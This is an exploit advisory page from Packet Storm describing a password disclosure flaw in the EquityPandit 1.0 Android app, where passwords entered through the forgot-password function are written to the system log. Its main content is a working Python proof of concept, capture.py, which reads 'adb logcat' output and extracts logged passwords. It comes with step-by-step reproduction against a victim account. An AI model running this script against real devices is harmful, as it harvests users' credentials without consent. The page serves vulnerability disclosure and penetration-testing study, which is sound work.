exploit the possibilities

EquityPandit 1.0 Password Disclosure

EquityPandit 1.0 Password Disclosure
Posted May 28, 2019
Authored by ManhNho

EquityPandit version 1.0 suffers from a password disclosure vulnerability.

tags | exploit
MD5 | b02f26593dbcac5ed9495a8e3fd0c4b4

EquityPandit 1.0 Password Disclosure

Change Mirror Download
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

- Sometimes developers keeps sensitive data logged into the developer
console. Thus, attacker easy to capture sensitive information like password.
- In this application, with adb, attacker can capture password of any
users via forgot password function.

#Requirement:

- Santoku virtual machine
- Android virtual machine (installed "EquityPandit" apk file)
- Victim user/password: victim@abc.com/123456
- Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

- Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


- Step 2: From Android machine, open EquityPandit, click forgot password
function for acccount "victim@abc.com" and then click submit
- Step 3: From Santoku, execute capture.py
- Actual: Password of "victim@abc.com" will be show in terminal as
"123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close